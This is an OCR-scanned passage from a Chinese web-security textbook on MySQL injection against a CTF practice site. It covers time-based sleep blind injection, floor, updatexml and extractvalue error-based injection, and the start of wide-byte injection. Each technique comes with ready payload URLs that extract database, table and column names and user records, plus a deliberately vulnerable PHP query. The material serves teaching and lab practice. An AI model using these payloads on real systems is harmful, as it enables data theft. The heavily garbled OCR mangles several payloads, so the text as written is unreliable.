发 现 页 面 不 显示 ctfs-wiki 字符 串 , 如 图 2-31 所 示 。 这 说 明 第 一 个 字符 的 ASCII 码 不 大 
于 117。 综 上 所 述 ,第 一 个 字符 的 ASCII 码 大 于 116 ,不 大 于 117, 说 明 第 一 个 字符 的 
ASCII 码 就 是 117, 也 就 是 字母 u。 


2.4.5 MySQL sleep 注入 


sleep 注 和 人 是 另 一 种 形式 的 盲 注 ,与 bool 注入 不 同 ,sleep 注入 没有 任何 报错 信息 输 
出 ,页 面 返回 不 管 对 或 者 错 都 是 一 种 状态 ,攻击 者 无 法 通过 页 面 返 回 状态 来 判断 输入 的 
SQL 注入 测试 语句 是 否 正确 ,只 能 通过 构造 sleep 注入 的 SQL 测试 语句 ,根据 页 面 的 返 
回 时 间 判 断 数据 库 中 存储 了 哪些 信息 。 


1. sleep 型 注入 payload 
sleep 型 注入 payload 如 下 : 
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http;//192.168.91.142/sgli/03.php?id 1 and ascii(substring((select username from ctfswiki.user limit 0,1),1,1))>117 


[C Enable Post data [ Enable Referrer 


Hi 


CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctfs-wiki 


MYSQL SQL 


index php?id-1 


|o CTFS-WIKI 


图 2-31 页 面 不 正常 返回 (5) 


一 


) 判断 当前 数据 库 的 长 度 。 例 如 : 


http://www.ctfs - wiki. com/index. php? id= 1 and sleep (if (length ((select 
database ()))710,0,5)) 


C2) 判断 数据 库 的 名 称 。 例 如 ,判断 数据 库 名 的 第 一 个 字符 : 


http://www.ctfs - wiki. com/index. php? id- 1 and sleep (if (ascii (substring 
(database (),1,1))«116,0,5)) 


判断 数据 库 名 的 第 二 个 字符 : 


http://www.ctfs - wiki. com/index. php? id- 1 and sleep (if (ascii (substring 
(database (),2,1)) «116,0,5)) 


(3) 判断 所 有 的 表 名 。 例 如 : 


http://www.ctfs - wiki. com/index. php? id=1 and sleep (if (ascii (substring 
((select table name from information schema.tables where table schema= 
'ctfswiki' limit 0,1),1,1))<101,0,5)) 


(4) 判断 user 表 的 列 名 。 例 如 : 


http://www.ctfs - wiki. com/index. php? id= 1 and sleep (if (ascii (substring 
((select column name from information schema.columns where table name- 'user' 
and table schema-'ctfswiki' limit 0,1),1,1))«105,0,5)) 
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C5) 判断 列 的 值 。 例 如 : 


http://www.ctfs - wiki. com/index. php? id- 1 and sleep (if (ascii (substring 
((select username from ctfswiki.user limit 0,1),1,1))«69,0,5)) 


2. 基础 函数 

sleep 函数 可 以 使 执行 挂 起 一 段 时 间 。 

例如 ,运行 select sleep(3) ,程序 执行 了 3s, 如 图 2-32 所 示 。 

IF(exprl,expr2,expr3) 的 效果 类 似 于 编程 语言 中 常见 的 三 元 运算 符 。 如 果 exprl 
为 真 (不 等 于 0 且 不 等 于 null) ,返回 expr2 ,否则 返回 expr3。 

例如 ,运行 SELECT IF(1—2, yes','no) 1-2 为 真 ,返回 yes, 如 图 2-33 所 示 。 


no'); 


1 row in set (3.00 sec) 


1 row in set 


图 2-32 select sleep(3) 使 程序 执行 3s 图 2-33 返回 yes 


3. sleep 注入 示例 代码 分 析 
sleep 注入 示例 代码 如 下 : 


$id-$ GET['id']; 
$sql-"SELECT * FROM users WHERE id-$id LIMIT 0,1"; 
$result-mysql query($sql); 
$row-mysql fetch array($result); 
if ($result) ( 
echo "ctfs-wiki"; 
) else{ 
echo "ctfs-wiki"; 
) 


从 上 述 代码 中 可 以 看 出 , $ id 参数 没有 过 滤 ,直接 拼接 到 数据 库 中 执行 ,存在 数字 型 
注入 。 与 boo 型 注入 不 同 的 是 ,此 代码 不 管 有 没有 查询 到 结果 ,都 输出 ctfs-wiki 字符 串 ， 
这 样 bool 注入 的 payload 也 无 效 , 只 能 通过 sleep 函数 ,根据 数据 的 返回 时 间 来 判断 输入 
的 SQL 注入 测试 语句 是 否 正确 ,最 终 实现 注入 。 


4. sleep 注入 过 程 
1) 利用 sleep 注入 获取 数据 库 名 
如 果 还 是 用 前 面 的 sleep 注入 的 payload, 发 现 无 法 判断 对 错 ,都 显示 一 样 的 页 面 。 
bool 注入 payload 无 法 对 sleep 型 注入 点 进行 注入 ,如 图 2-34 所 示 。 
利用 sleep 函数 和 让 函数 构造 sleep 注入 测试 语句 : sleepCifCasciiCsubstring( databaseO , 
1,1)) 之 99,0,5))。 首 先 利 用 substring 函数 取出 数据 库 名 中 的 第 一 个 字符 ,然后 利用 ascii 
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http://192.168.91.142/sgli/04.php?id- 1 and ascii(substring((select username from ctfswikiuserlimit01)11)>1000| 


L] Enable Post data [ ] Enable Referrer 


CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 令 执 行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctfs-wiki 


MYSQL SQL 


index php?id=1 


ctfs-wiki 


© CTFS-WIKI 


图 2-34 bool 注入 payload 无 法 对 sleep 型 注入 点 进行 注入 


函数 进行 ASCI 码 转换 并 与 数字 99 比较 ,然后 再 利用 让 函数 判断 数据 库 名 中 的 第 一 个 字符 
的 ASCI 码 是 否 大 于 99。 如 果 大 于 99 ,让 函数 返回 0, 最终 sleep 函数 执行 的 是 sleep(0) ,网 
页 会 立刻 返回 ;如 果 不 大 于 99 ,让 函数 返回 5, 最 终 sleep 函数 执行 的 是 sleep(5) ,网 页 会 延迟 
5s 后 返回 。 根 据 payload 的 返回 时 间 就 可 以 判断 数据 库 名 中 的 字符 。 

输入 以 下 测试 语句 : 


http://192.168. 91. 142/sq1li/04. php? id= 1 and sleep (if (ascii (substring 
(database(),1,1))299,0,5)); 


发 现 页 面 执行 了 5s, 如 图 2-35 所 示 。 这 说 明 数 据 库 名 的 第 一 个 字符 的 ASCII 码 不 大 于 99. 


http /192.16851:142/s35/04 hpid=1 and sleep iWasciisubatriag(database0.1.1))>9905 


] Enable Post data [ Enable Referrer 


CTFS-WIKI 


此 网 站 中 集合 了 SQL 注 入 、 文 件 和 包含、 外 


I、 反 序 列 化 、SSRF、 文 件 上 传 等 常见 的 web 汤 洞 环境 


Follow Gctfs-wiki 
MYSQL SQL 


ts-wlki 


peres wa 


图 2-35 页 面 执行 了 5sCD 
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输入 以 下 测试 语句 : 


http://192.168. 91. 142/sq1li/04. php? id= 1 and sleep (if (ascii (substring 
(database (),1,1))298,0,5)); 


发 现 页 面 立刻 返回 ,如 图 2-36 所 示 。 这 说 明 数 据 库 名 的 第 一 个 字符 的 ASCII 码 大 于 98. 
前 面 已 经 判断 其 不 大 于 99 ,说 明 数 据 库 名 的 第 一 个 字符 的 ASCII 码 是 99, 也 就 是 字母 c。 


http://192.168.91.142/sqli/04.php?id=1 and sleep( if(asciitsubstine(database(, 1,1)» 980,5 J) 


口 Enable Post data [ ] Enable Referrer 


CTFS-WIKI 
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Follow @ctfs-wiki 


MYSQL SQL 


index php?id=1 


ctfs-wiki 


© CTFS-WIKI 


图 2-36 页 面 立 即 返回 (1) 


本 例 还 是 通过 and sleepCifCasciiCsubstringCdatabaseO ,1,1)) 之 x,0,5)) 获 取 数 据 库 
名 中 其 他 字符 串 的 信息 ,最 终 得 到 数据 库 的 名 称 为 ctfswiki。 

2) 利用 sleep 注入 获取 表 名 

获取 表 名 的 原理 与 前 面 是 一 样 的 ,通过 依次 判断 表 名 的 各 个 字符 的 ASCH 码 来 得 到 
表 名 。 

通过 以 下 测试 语句 获取 数据 库 中 的 表 名 ,得 到 数据 库 中 一 个 表 的 名 称 为 user。 


andascii(substr((select table name from information schema.tables where 
table schema-'ctfswiki' limit 0,1),1,1))«x 


下 面 介绍 获取 表 名 的 第 一 个 字符 的 过 程 。 
输入 以 下 测试 语句 : 


http://192.168. 91. 142/sqli/04. php? id= 1 and sleep (if (ascii (substring 
((select table name from information schema.tables where table schema- 
'ctfswiki' limit 0,1),1,1))»116,0,5)) 


发 现 页 面 立刻 返回 ,如 图 2-37 所 示 。 这 说 明 第 一 个 字符 的 ASCII 码 大 于 116. 
输入 以 下 测试 语句 : 
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[] Enable Post data [] Enable Referrer 
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此 网 站 中 集合 了 SQL 注入 、 文 件 包 合 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 泥 洞 环境 


Follow @ctfs-wiki 
MYSQL SQL 


etsia 


©CTFS-g 


图 2-37 页 面 立即 返回 (2) 


http://192.168. 91. 142/sqli/04. php? id= 1 and sleep (if (ascii (substring 
((select table name from information schema.tables where table schema- 
'"ctfswiki' limit 0,1),1,1))»2117,0,5)) 


发 现 页 面 执行 了 5s, 如 图 2-38 所 示 。 这 说 明 第 一 个 字符 的 ASCII 码 不 大 于 117。 综 上 所 
述 ,第 一 个 字符 的 ASCII 码 大 于 116 ,不 大 于 117, 说 明 第 一 个 字符 的 ASCII 码 就 是 117, 
也 就 是 字母 u。 


MtpY/192.168.91.142/59 /04php?4= 1 and sleep isciisubstri se (select able name from information schema.tables where table schema cfewi emit O, 


11705) 


O Enable Post data [C] Enable Referrer 
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Follow @etts-wiki 
MYSQL SQL 


CS 


ecTFSWId 


图 2-38 页 面 执行 了 5s(2) 


3) 利用 sleep 注入 获取 列 名 

获取 列 名 的 原理 和 前 面 是 一 样 的 ,通过 依次 判断 列 名 中 各 个 字符 的 ASCI 码 来 得 到 
列 名 。 

通过 以 下 测试 语句 获取 数据 库 中 的 列 名 ,得 到 数据 库 中 user 表 的 一 个 列 的 名 称 为 
username。 
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and sleep( if (ascii (substr ((select column name from information schema. 
columns where table name-'user' and table schema-'ctfswiki' limit 0,1),1, 
1))«x,0,5 )) 


下 面 介绍 获取 列 名 的 第 一 个 字符 的 过 程 。 
输入 以 下 测试 语句 : 
http://192.168. 91. 142/sq1i/04. php? id= 1 and sleep (if (ascii (substring 


((select scolumn name from information schema.columns where table name- 
'user' and table schema-'ctfswiki' limit 1,1),1,1))»5116,0,5)) 


发 现 页 面 立 刻 返 回 , 如 图 2-39 所 示 。 这 说 明 第 一 个 字符 的 ASCII 码 大 于 116. 


tpoj[192.168.81.142/sgl/G4 phpřid= 1 and sleep iasci(substring (select column name from information schema.columns where table name= user and table schema= ctfswiki mit 1.1] 1.» 
neos) 


C] Enable Post data [) Enable Referrer 


e ——— ——————— —— l 
CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包 含 


行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环 境 


Follow @ctfs-wiki 


MYSQL SQL 
—! 
图 2-39 页 面 立 即 返回 (3) 
输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/03.php? id-1 and ascii (substring((select column | 
name from information schema.columns where table name- ' user ' and table — 
Schema-'ctfswiki' limit 1,1),1,1))»117 


发 现 页 面 执行 了 5s, 如 图 2-40 所 示 。 这 说 明 第 一 个 字符 的 ASCII 码 不 大 于 117. # Er 
述 ,第 一 个 字符 的 ASCII 码 大 于 116 ,不 大 于 117, 说 明 第 一 个 字符 的 ASCII 码 就 是 117， 
也 就 是 字母 u。 

4) 利用 sleep 注入 获取 数据 

获取 数据 的 原理 和 前 面 是 一 样 的 ,通过 依次 判断 数据 中 各 个 字符 的 ASCII 码 来 得 到 
数据 。 

通过 以 下 测试 语句 获取 数据 库 中 user 表 username 列 中 的 第 一 个 数据 为 userl 。 


and sleep (if (ascii (substring((select username from ctfswiki.user limit 0, 
1),1,1))«x,0,5)) 
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http://192.168.91.142/sqli/04.php?id=1 and sleep( iflascii(substring((select table name from information schema.tables where table schemaz'ctfswiki limit 0,1).1,1))> 
11705) 


L] Enable Post data [] Enable Referrer 


H 
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此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctfs-wiki 
MYSQL SQL 


ctfs-wiki 


© CTFS-WIKI 


图 2-40 页 面 执行 了 5s(3) 


下 面 介绍 获取 列 名 的 第 一 个 数据 的 过 程 。 
输入 以 下 测试 语句 : 


http://192.168. 91. 142/sqli/04. php? id= 1 and sleep (if (ascii (substring 


((select username from ctfswiki.user limit 0,1),1,1))>116,0,5)) 


发 现 页 面 立 即 返回 ,如 图 2-41 所 示 。 这 说 明 第 一 个 字符 的 ASCII IB KT 116, 


httpV/192.168.91.142/sqly04.php?id=1 and sleep( if(ascii(substring((select username from ctfswiki.user limit 0,1)1,1))» 116,0,5 )) 


C Enable Post data [C] Enable Referrer 
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此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctfs-wiki 
MYSQL SQL 


ctfs-wiki 
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图 2-41 页 面 立 即 返回 (4) 


输入 以 下 测试 语句 : 
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http://192.168. 91. 142/sq1i/04. php? id= 1 and sleep (if (ascii (substring 
((select username from ctfswiki.user limit 0,1),1,1))»2117,0,5)) 


发 现 页 面 执 行 了 5s, 如 图 2-42 所 示 。 这 说 明 第 一 个 字符 的 ASCII 码 不 大 于 117。 综 上 所 
述 ,第 一 个 字符 的 ASCII 码 大 于 116 ,不 大 于 117, 说 明 第 一 个 字符 串 的 ASCII 码 就 是 
117, 也 就 是 字母 u, 


http://192.168.91.142/sqli/04.php?id=1 and sleep( iffascii(substring((select username from ctfswikiuser limit 0,1),1,1))>117,0,5 )) 


L] Enable Post data []] Enable Relerrer 


LLL MEM 
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Follow @ctfs-wiki 
MYSQL SQL 
index php?id-1 


cts-wiki 


© CTFS-WIK 


图 2-42 页 面 执行 了 5s(4) 


2.4.6 MySQL floor 注入 


floor 注入 是 报错 注入 的 一 种 方式 ,主要 原因 是 rand. 函数 与 group by 子 句 一 起 使 用 
时 ,rand 函数 会 计算 多 次 ,会 导致 报错 产生 的 注入 。 


1. floor 注入 payload 
floor 注入 payload 如 下 : 
(1) 获取 当前 数据 库 名 称 。 例 如 : 


http://www.ctfs-wiki.com//index.php? id-1 and (select 1 from (select count(*), 
concat (database(),floor(rand(0) * 2))x from information schema.tables group 
by x)a) 


(2) 获取 当前 数据 库 的 表 名 。 例 如 : 


http://www.ctfs-wiki.com//index.php? id-1 and (select 1 from (select count(*), 
concat((select (table name) from information schema. tables where table _ 
Schema-database() limit 0,1),floor (rand (0) *2))x from information schema. 
tables group by x)a) 
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(3) 获取 当前 数据 库 的 列 名 。 例 如 : 


http://www.ctfs-wiki.com/index.php? id-1 and (select 1 from (select count( *), 
concat((select (column name) from information schema.columns where table _ 
Schema-database() and table name-'user' limit 0,1),floor(rand(0) * 2))x from 
information schema.tables group by x)a) 


(4) 获取 数据 。 例 如 : 


http://www.ctfs-wiki.com/index.php? id-1 and (select 1 from (select count (*), 
concat((select username from user limit 0,1), 0x3a, floor (rand () * 2)) x from 
information schema.tables group by x)a) 


2. 基础 函数 

floor 注入 使 用 floor 函数 和 rand 函数 。 

1) floor 函数 

floor(z) 返 回 不 大 于 z 的 最 大 整数 值 。 

例如 ,运行 select floor(1. 4) ,返回 1, 如 图 2-43 所 示 o 
2) rand 函数 

rand 函数 返回 一 个 0 一 1 的 随机 数 。 

例如 ,执行 select rand() 会 返回 随机 数 , 如 图 2-44 所 示 。 


mysql» SELECT rand() ; 
+ 


mysql» SELECT floor(1.4); 


pisse 


1 
+ 


1 row in set 


2-43 select floor(1.4) 返 回 1 图 2-44 select rand() 返 回 随机 数 


3. floor 注入 原理 分 析 

1) rand 函数 与 group by 子 句 

floor 注入 是 rand 函数 在 与 group by 子 句 一 起 用 时 多 次 计算 而 导致 的 。 

floor 注 入 中 使 用 的 报错 注入 语句 select count ( * ), (floor(rand( ) * 2)) x from 
information schema. tables group by x 其 实 就 是 select count( * ) , (floor(randO * 2))x 
from information schema. tables group by (floor(randO * 2)) 。 

floor(randO * 2) 执 行 完成 后 返回 的 值 是 0 或 者 1, 因 为 OL randO — 1,0 randO2—2, 
而 floor 函数 返回 不 大 于 x 的 最 大 整数 值 ,所 以 最 终 floor(rand()2) 的 值 是 0 或 者 1, 因 此 
group by (floor(rand() * 2)) 就 是 group by 0 或 者 group by 1。 
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2) count( x ) 与 group by 虚拟 表 

MySQL 在 执行 select count( x ) from tables group by x 这 类 语句 时 会 创建 一 个 虚 
拟 表 ,然后 在 虚拟 表 中 插入 数据 。 

首先 创建 虚拟 表 的 结构 (key 是 主键 ,不 可 重复 ;count( « ) 用 于 计数 ) ,如 表 2-1 所 示 。 


表 2-1 虚拟 表 的 结构 


key count( * ) 


Eee 


然后 进行 数据 查询 ,首先 查看 虚拟 表 中 是 否 存在 此 数据 。 如 果 不 存在 ,就 插入 新 数 
据 ; 如 果 存 在 ,就 将 count(* ) 字 段 加 1, 

查询 第 一 条 记录 , 当 执行 floor(rand() * 2) 后 ,如 果 返 回 值 为 1( 第 一 次 计算 ) ,虚拟 表 
中 不 存在 1, 则 floor(rand() * 2) 会 再 计算 一 次 (第 二 次 计算 ), 返 回 值 为 1, 将 1 插入 数据 
表 , 将 count» ) 字 段 加 1, 此 时 的 虚拟 表 如 表 2-2 所 示 。 


表 2-2 key 为 1.count(* ) 为 1 时 的 虚拟 表 


key count( * ) 


1 1 


查询 第 二 条 记录 , 当 执行 floor(rand() * 2) 后 ,如 果 返 回 值 为 1( 第 三 次 计算 ) ,虚拟 表 中 存 
在 1, 则 floor(rand() * 2) 不 会 再 次 计算 ,将 count(* ) 字 段 加 1, 此 时 的 虚拟 表 如 表 2-3 所 示 。 


3X 2-3 key 28 l.count( x ) 为 2 时 的 虚拟 表 


key count( * ) 


1 2 
查询 第 三 条 记录 , 当 执行 floor(rand() * 2) 后 ,如 果 返 回 值 为 0( 第 四 次 计算 ) ,虚拟 表 


中 不 存在 0, 则 floor(randO x 2) 会 再 计算 一 次 (第 五 次 计算 ) ,返回 值 为 0, 将 0 插入 数据 
表 , 将 count( * ) 字 段 加 1, 此 时 的 虚拟 表 如 表 2-4 所 示 。 


表 2-4 key 为 0、count( * ) 为 1 时 的 虚拟 表 


key count( x ) 
1 2 
0 1 


如 果 在 查询 第 三 条 记录 时 第 五 次 计算 的 结果 不 是 0, 而 是 1, 插 入 的 数据 就 是 1。 由 
于 1 已 经 在 虚拟 表 中 了 ,这 样 就 导致 报错 ,这 就 是 floor 注入 的 原理 。 


4. floor 注入 过 程 
1) 获取 当前 数据 库 名 
输入 以 下 测试 语句 : 
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http://www.ctfs-wiki.com//index.php? id-1 and (select 1 from(select count (* ), 
concat (database (), floor (rand (0) * 2))x from information schema.tables group 
by x)a) 


因为 count( x ) 5j group by 虚拟 表 在 执行 的 过 程 中 会 产生 报错 ,会 提示 Duplicate entry 
'ctfswikil' for key 'group_key' 错 误 信息 ,如 图 2-45 所 示 ,就 可 以 通过 这 个 错误 信息 获取 
当前 的 数据 库 名 为 ctfswiki。 


Wl Load URL [httpi/www.ctfs-wiki.com/index pho"id 1 and (select 1 from (select count(") concatidatabase( floor(rand(0)"2)) from information schema tables group by xja) 
& seu. 


Eyecute 


[J Enable Post dasta [7] Enable Referrer 


一 一 
CTFS-WIKI 
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Follow @ctts-wiki 
MYSQL SQL 


Duplicate entry 'ctfswio1' for key 'oroup. key 
OCTFS-WIK 


Fd 2-45 floor 注入 返回 关于 数据 库 的 错误 信息 


2) 获取 当前 数据 库 的 表 名 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/index.php?id=1 and (select 1 from (select count ( * ), 
concat((select (table name) from information schema.tables where table 
Schema-database() limit 0,1), floor (rand(0) *2))x from information schema. 
tables group by x)a) 


会 提示 Duplicate entry 'userl' for key 'group_key' 错 误 信 息 , 如 图 2-46 所 示 , 通 过 这 个 错 
误 信 息 就 可 以 得 知 ctfswiki 存在 user XX. 

3) 获取 当前 数据 库 表 的 列 名 

输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/index.php? id-1 and (select 1 from (select count( *), 
concat((select (column name) from information schema.columns where table 
Schema-database() and table name -'user' limit 0,1),floor(rand(0) * 2))x from 
information schema.tables group by x)a) 


会 提示 Duplicate entry 'passwordl' for key 'group_key' 错 误 信息 ,如 图 2-47 所 示 ,通过 这 
个 错误 信息 就 可 以 得 知 user 表 存 在 password 1 1 列 。 
输入 以 下 测试 语句 : 
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Wi LoadURL [hepy mwn ct wiki com/fnden ph 


Ñ speum table achemamdstabase0 Emit 01) docs 


= | 


C Enable Post data (7] Enable Referrer 


Follow @ctfs-wiki 


MYSQL SQL 


dex php?ia- 


Duplicate entry "user?" for key 'oroup. key 
e CTFS- WII 


图 2-46 floor 注入 返回 关于 数据 库 表 的 错误 信息 


Load URL [htipi/wwwccths-wkc.com/index phpT d=1 and (select 1 from (select count(")concat(select (column. name) from information schems.columns where 
SpitURL table schema-databaseo and table name-'user limit 0 1)locrirand(Q)'2)x from information schema.tables group by xii 


Execute 


DE Enable Referer. 
CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包 合 、 命 令 执 行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 洞 


Follow @ctfs-wiki 


MYSQL SQL 


Andex php? 


Duplicate entry 'passvord' for key group_key 
OCTFS-WIG 


图 2-47 floor 注 和 返回 关于 password 1 列 的 错误 信息 


http://www.ctfs-wiki.com/index.php?id-1 and (select 1 from (select count(*), 
concat((select (column name) from information schema.columns where table _ 
Schema-database() and table name -'user' limit 1,1),floor(rand(0) * 2))x from 
information schema.tables group by x)a) 


会 提示 Duplicate entry 'usernamel' for key 'group_key' 错 误 信 息 ,如 图 2-48 所 示 ,通过 这 
个 错误 信息 就 可 以 得 知 user 表 存 在 username 1 列 。 
4) 获取 数据 
输入 以 下 测试 语句 : 
http://www.ctfs-wiki.com/index.php? id-1 and (select 1 from (select count (* ), 
concat ( (select username from user limit 0, 1), 0x3a, floor (rand() * 2)) x from 


information_schema.tables group by x)a) 
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C Enable Post dats []Enable Referrer 


CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 


Follow @ctfs-wiki 
MYSQL SQL 


Duplicate entry "username! for key group_key' 
OCIFS-WK 


合 、 命 令 执 f 


图 2-48 floor 注 入 返回 关于 username 1 列 的 错误 信息 


会 提示 Duplicate entry 'userl : 0' for key 'group_key' 错 误 信息 ,如 图 2-49 所 示 , 通 过 这 个 
错误 信息 就 可 以 得 知 username 1 列 中 存储 的 数据 是 userl 。 


FETTE — 
Ñ spur [^^ hema tables group. 
trecute 
J enable Post data [ inae Relrrer 
CTFS-WIKI 
此 网 站 中 集合 了 SQL 注入 、 文 件 包含 
Follow @ctfs-wikl 
ndes php? 
Dupicale entry vserl 0 for key group, key 
@cTFS wa 


命令 执行 


反 序 列 化 、SSRF、 文 件 上 传 等 常见 的 web 涯 酒 环境 


图 2-49 


floor 注入 返回 user 表 username 1 列 数据 的 错误 信息 


2.4.7 MySQL updatexml 注入 


updatexml 注入 也 是 一 种 报错 注入 , 它 利用 updatexml 函数 中 第 二 个 参数 XPath_ 
string 的 报错 进行 注入。XPath_string 是 XML 文档 路 径 ,格式 是 /XXX/XXX/XXxx/， 


如 果 格 式 不 正确 就 会 报错 。 


1. updatexml 注入 payload 
updatexml iE À payload 如 下 : 


CD 查看 数据 库 的 名 称 。 例 如 : 


http://ip/index.php? id-1 and updatexml (1,concat (0x7e, (database ())),0) # 
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(2) 查看 所 有 的 表 信息 。 例 如 : 


http://ip/index.php? id- 1 and updatexml (1, concat (0x7e, (select table name 
from information schema.tables where table schema-'ctfswiki' limit 1,1 )),0) # 


(3) 查看 表 的 列 信息 。 例 如 : 


http://ip/index.php? id-1 and updatexml (1, concat (0x7e, (select column name 
from information schema.columns where table schema-'ctfswiki' limit 1,1 )),0) 4 


(4) 查看 列 的 值 。 例 如 : 


http://ip/index.php? id-1 and updatexml (1,concat (0x7e, (select password from 
user limit 0,1)),0) & 


2. extractvalue 和 updatexm! 函数 

MySQL 在 5.1.5 版 本 中 添加 了 对 XML 文档 进行 操作 的 两 个 函数 , 其中， 
extractvalue 函数 可 以 对 XML 文档 进行 查询 ,updatexml 函数 可 以 对 XML 文档 进行 
更 新 。 


3. updatexml 注 入 原理 分 析 
updatexml 函数 的 语法 格式 如 下 : 


updatexml(XML document, XPath string, new value) 


Hp: 
XML document 是 String 型 数据 ,是 目标 XML 文档 的 文件 格式 。 
XPath string (Xpath 格式 的 字符 串 ) 是 XML 文档 路 径 。 
new. value 是 String 型 数据 ,用 于 替换 查找 到 的 符合 条 件 的 数据 。 
下 面 通过 示例 介绍 updatexml 注入 原理 。 
(1) 创建 名 为 ctfswiki 的 表 : 


create table ctfswiki( 
doc varchar (150) 
); 


(2) 向 ctfswiki 表 中 插入 数据 1: 


insert into ctfswiki values (' 
«book» 
«title»ctfswiki0l«/title» 
«author» 
Xinitial»ctfs0Ol«/initial» 
«surname»wiki01«/surname» 
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(3) 向 ctfswiki 表 中 插入 数据 2: 


(4) ctfswiki 表 创 建 完 成 后 ,查询 ctfswiki 表 中 的 数据 ,可 以 查 到 两 个 XML 数据 ,如 
图 2-50 所 示 。 


<title>ctfswiki0l</title> 
<author> 
Xinitial»ctfsOlc/initial» 
«surname»wiki01«/surname» 
«/author» 
</book> 

L 


<book> 
<title>ctfswiki02</title> 
«author» 
Xinitial»ctfs02«/initial» 
X«surname»wiki02«/surname» 


图 2-50 查 到 两 个 XML 数据 


(5) 通过 updatexml 函数 将 ctfswiki 表 中 doc 文档 的 initial 节点 改 为 ctfs03: 


(6) 通过 查询 ctfswiki 表 中 的 数据 发 现 initial 节点 已 经 改 为 ctfs03: 
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«title»ctfswiki0l«/title» 
«author» 

ctfs03 

«surname» wiki01«/surname» 
«/author» 

< /book» 

«book» 
«title»ctfswiki02«/title» 
«author» 

ctfs03 

«surname» wiki02«/surname» 
«/author» 

< /book» 
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通过 updatexml 函数 对 ctfswiki 表 中 的 doc 文档 中 的 concat (0x7e, (version())) 数 
据 进 行 更 新 ,因为 concat(0x7e, (version())) 不 符合 XPath_string 的 格式 ,导致 报错 ,将 
表 的 信息 通过 报错 显示 了 出 来 ,这 就 是 updatexml 注入 的 原理 。 


mysql»update ctfswiki set doc-updatexml (doc, concat (0x7e, (database())), 


"oEFo03)T 


1105 -XPATH syntax error: '-ctfswiki' 


4. updatexm! i£ A 3t f 
输入 以 下 测试 语句 : 


http://ip/index.php? id-1 and updatexml (1,concat (0x7e, (database())),0) # 


获取 了 当前 数据 库 为 ctfswiki 的 信息 ,如 图 2-51 所 示 。 


htp//192:16851.142/39]/06hpid- 1 ard updatenu(Lconcatíox7e (detabase().O) 4 


C Enable Post data [] Enable Referrer 


CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 
件 上 传 webi EAS 


Follow @ctfs-wiki 
MYSQL updatexml SQLI 
index prp?ia=1 


XPATH syntax error "-ctíswik 
@CTFS-WIKI 


命令 执行 、XXE、 反 序列 化 、 SSRF., XSS, X 


图 2-51 获取 了 当前 数据 库 的 表 为 ctfswiki 的 信息 
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2.4.8 MySQL extractvalue 注入 
extractvalue 函数 可 以 对 XML 文档 进行 查询 。extractvalue 注入 也 是 一 种 报错 注 


人, 它 与 updatexml 注入 的 原理 一 样 ,也 是 利用 了 函数 中 第 二 个 参数 XPath_string 的 报 
错 进行 注入 。XPath_string 是 XML 文档 路 径 , 格 式 是/X XX/X XX/X XxX/, 如 果 格 
式 不 正确 就 会 报错 。 


1. extractvalue 注入 payload 
extractvalue 注入 payload 如 下 : 
(1) 查看 数据 库 的 名 称 。 例 如 : 


http://ip/index.php? id-1 and extractvalue (1,concat (0x7e, (database ()))) # 


(2) 查看 所 有 的 表 信 息 。 例 如 : 


http://ip/index.php? id-1 and extractvalue (1,concat (0x7e, (select table name 
from information schema.tables where table schema-'ctfswiki' limit 1,1 ))) $ 


(3) 查看 表 的 列 信息 。 例 如 : 
http://ip/index.php? id-1 and extractvalue (1, concat (0x7e, (select column . 


name from information schema.columns where table schema-'ctfswiki' limit 1, 
1))) $ 


(4) 查看 列 的 值 。 例 如 : 


http://ip/index.php? id-1 and extractvalue (1, concat (0x7e, (select password 
from user limit 0,1))) # 


2. extractvalue 注入 过 程 
输入 以 下 测试 语句 : 


http://ip/index.php? id-1 and extractvalue(1,concat (0x7e, (database()))) # 


获取 了 当前 数据 库 为 ctfswiki 的 信息 ,如 图 2-52 所 示 。 


2.4.9 MySQL 宽 字 节 注 入 
开发 者 为 了 防止 出 现 SQL 注入 攻击 ,将 用 户 输入 的 数据 用 addslashes 等 函数 进行 过 


滤 。addslashes 等 函数 默认 对 单 引 号 等 字符 进行 转 义 ,这 样 就 可 以 避免 注入。 宽 字 节 注 
入 产生 的 原因 是 : MySQL 在 使 用 GBK 编码 的 时 候 , 如 果 第 一 个 字符 的 ASCII 码 大 于 
128 ,会 认为 前 两 个 字符 是 一 个 汉字 ,会 将 后 面 的 转 义 字符 \“ 吃 掉 ”, 将 前 两 个 字符 拼接 为 
汉字 ,这 样 就 可 以 将 SQL 语句 闭合 ,造成 宽 字 节 注入 。 
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ap //1S2-16891342/sqH05php d= and esractaluetconcai(BcTe database F] 


L] Enable Post data [] Enable Referrer 


T 
CTFS-WIKI 


此 网 站 中 集合 了 SQL 注 入 、 文 件 包 合 、 命 令 执 行 . XXE、 反 序列 化 SSRF、XSS、 文 
件 上 传 等 常见 的 web 漏 洞 环 境 


Follow @ctfs-wiki 


MYSQL updatexml SQLI 


index php?id-1 


4 syntax error: "-ctiswiki* 


2-52 获取 了 当前 数据 库 为 ctfswiki 的 信息 


1. 宽 字 节 注 入 payload 
宽 字 节 注入 payload 如 下 : 
(1) 查看 数据 库 的 名 称 。 例 如 : 


http://ip/index.php? id-19$81' and 1-2 union select l,database(),3 $23 


(2) 查看 所 有 的 表 信 息 。 例 如 : 


